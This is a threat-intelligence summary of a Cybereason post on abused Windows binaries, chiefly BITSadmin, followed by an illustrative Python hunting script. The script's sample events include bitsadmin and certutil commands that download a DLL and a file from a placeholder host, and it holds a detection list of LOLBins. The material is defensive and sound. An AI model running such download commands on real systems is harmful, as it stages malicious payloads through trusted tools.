March 15, 2022

Cybereason LOLBins & BITSadmin

Industry: N/A | Level: Tactical | Source: Cybereason

Cybereason’s threat hunting post dives into the usage of Living Off the Land Binaries (LOLBins), with a deep dive into the tool BITSadmin. Many malware and ransomware variants abuse trusted binaries for threat activity. Notable LOLBins utilized include msiexec, wscript, installutil, rundll32, regsvr32, wmic, certutil and bitsadmin. A variety of other applicable LOLBins can be reviewed in the LOLBAS project on GitHub, with many detections also available in the Anvilogic Armory. Analysis of BITSadmin found the tool has many legitimate uses to “create, download, or upload jobs and monitor their progress,” as detailed in Microsoft’s documentation. Attackers have leveraged BITSadmin’s capabilities to download malicious payloads and/or to copy and move files. Various malware families, such as the Astaroth malware, Egregor ransomware and the Ramnit trojan, have utilized BITSadmin.

  • Anvilogic Scenario: Astaroth – Attack Chain with LOLBins
  • Anvilogic Use Cases:
    • BITSadmin Execution
    • Msiexec Abuse
    • Wscript/Cscript Execution
    • regsvr32 Execution
    • Rundll32 Command Line
    • Suspicious process Spawned by Java
    • Certutil File Download
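A minimal hunting pass over constructed process-creation events, added here as an illustration and not code from Cybereason or Anvilogic. It scores the BITSadmin, certutil and parent-process (Java) use cases above; the verb sets, parent list, sample events and score weights are assumptions chosen for the example, and the URLs use a reserved `.invalid` domain.

```python
import re

# Trusted Windows binaries the post names as commonly abused (image file names, lowercase)
LOLBINS = {"bitsadmin.exe", "certutil.exe", "msiexec.exe", "wscript.exe", "cscript.exe",
           "installutil.exe", "rundll32.exe", "regsvr32.exe", "wmic.exe"}
# bitsadmin verbs that create or feed a job (download/upload) versus verbs that only inspect jobs
BITS_JOB_VERBS = {"/transfer", "/addfile", "/create", "/resume"}
BITS_MONITOR_VERBS = {"/list", "/info", "/monitor", "/getstate"}
# Parents that should rarely launch a LOLBin (mirrors the "Spawned by Java" use case; assumption)
SUSPICIOUS_PARENTS = {"java.exe", "javaw.exe"}
URL_RE = re.compile(r"\b(?:https?|ftp)://[^\s\"']+", re.IGNORECASE)

# Constructed sample events (not real telemetry): Sysmon/EDR-style process creation records
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\bitsadmin.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": "bitsadmin /list /allusers"},
    {"image": r"C:\Windows\System32\bitsadmin.exe", "parent": r"C:\Program Files\Java\bin\java.exe",
     "cmdline": "bitsadmin /transfer upd /download /priority high http://example.invalid/p.dll C:\\Users\\Public\\p.dll"},
    {"image": r"C:\Windows\System32\certutil.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "certutil -urlcache -split -f http://example.invalid/a.txt a.txt"},
    {"image": r"C:\Windows\System32\certutil.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "certutil -hashfile setup.msi SHA256"},
]

def score_event(ev):
    """Return a score/reasons record for a LOLBin execution, or None for non-LOLBin images."""
    image = ev["image"].rsplit("\\", 1)[-1].lower()
    parent = ev["parent"].rsplit("\\", 1)[-1].lower()
    cmd = ev["cmdline"].lower()
    if image not in LOLBINS:
        return None
    score, reasons = 1, []          # any LOLBin execution is worth recording (matches "Execution" use cases)
    tokens = set(cmd.split())
    has_url = bool(URL_RE.search(cmd))
    if image == "bitsadmin.exe":
        if tokens & BITS_JOB_VERBS:
            score += 2; reasons.append("bitsadmin job creation/transfer")
        elif tokens & BITS_MONITOR_VERBS and not has_url:
            reasons.append("bitsadmin monitoring only")   # legitimate progress checks stay low
    if image == "certutil.exe" and "-urlcache" in tokens:
        score += 2; reasons.append("certutil urlcache (file download use case)")
    if has_url:
        score += 2; reasons.append("remote URL in command line")
    if parent in SUSPICIOUS_PARENTS:
        score += 3; reasons.append("spawned by " + parent)
    return {"image": image, "score": score, "reasons": reasons}

def hunt(events, threshold=3):
    """Score every event and return the ones at or above the threshold, highest score first."""
    hits = [h for h in map(score_event, events) if h and h["score"] >= threshold]
    return sorted(hits, key=lambda h: -h["score"])

if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(hit["score"], hit["image"], "; ".join(hit["reasons"]))
```

The `/list` and `-hashfile` events stay below the threshold, which is the false-positive handling a BITSadmin Execution rule needs once the tool's legitimate job-monitoring uses are accounted for.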